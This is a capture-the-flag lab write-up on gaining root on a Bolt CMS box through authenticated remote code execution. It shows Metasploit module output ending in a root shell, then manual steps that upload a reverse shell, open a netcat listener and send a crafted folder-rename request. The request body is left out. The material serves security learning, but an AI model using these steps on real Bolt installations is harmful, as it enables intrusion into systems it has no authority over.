This room is designed for users to get familiar with the Bolt CMS and how it can be exploited using Authenticated Remote Code Execution.

Okey dokey then. It’s easy rated. Let’s begin.


nmap says we’ve got three ports: 22 (SSH) and 80 (HTTP) and 8000. One of the questions is:

What port number has a web server with a CMS running?

so I think we can assume we’re looking for port 8000. Let’s go there.

Port 8000

The page helpfully gives us some creds - I guess this is an exercise in authenticated RCE after all - bolt:boltadmin123


We can exploit this with Metasploit - it’s basically this:

msf5 exploit(unix/webapp/bolt_authenticated_rce) > run

[*] Started reverse TCP handler on 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable. Successfully changed the /bolt/profile username to PHP $_GET variable "apyaem".
[*] Trying to find binary(python) on target machine
[*] Found python at 
[*] Using `python` to pop up an interactive shell
which python3
python3 -c 'import pty;pty.spawn("/bin/bash");'
root@bolt:~/public/files# ls -lash
root@bolt:/root# cd /home
cd /home
root@bolt:/home# ls -lash
ls -lash
total 288K
4.0K drwxr-xr-x  3 root root 4.0K Jul 18 19:36 .
4.0K drwxr-xr-x 27 root root 4.0K Jul 18 19:30 ..
4.0K drwxr-xr-x 10 bolt bolt 4.0K Jul 18 20:51 bolt
272K -rw-r--r--  1 root root 272K Jul 18 19:36 composer-setup.php
4.0K -rw-r--r--  1 root root   34 Jul 18 19:33 flag.txt
root@bolt:/home# cat flag.txt
cat flag.txt

So, that’s pretty easy.

Too Easy

In fact that was too easy, so let’s do it without metasploit. The below is based on this:

  1. Login to bolt with bolt:boltadmin123 at:
  2. Visit view-source: and copy the csrf token
  3. Upload a reverse shell with a .txt extension at, eg. shell.txt
  4. Start a netcat listener
  5. Sent this request via Burp, with the appropriate cookie and token values:
POST /async/folder/rename HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: bolt_session_4d15e6f652c744dfa859d2603ae24684=9e5fd37dba71affe7ae0febb83; bolt_authtoken_4d15e6f652c744dfa859d2603ae24684=5483a2218991ba3b7b1dec5a6a561ab81d4bc9e26b2168b4cb7501ce84fe24b1
Upgrade-Insecure-Requests: 1
Content-Length: 124
Content-Type: application/x-www-form-urlencoded


Finally, visit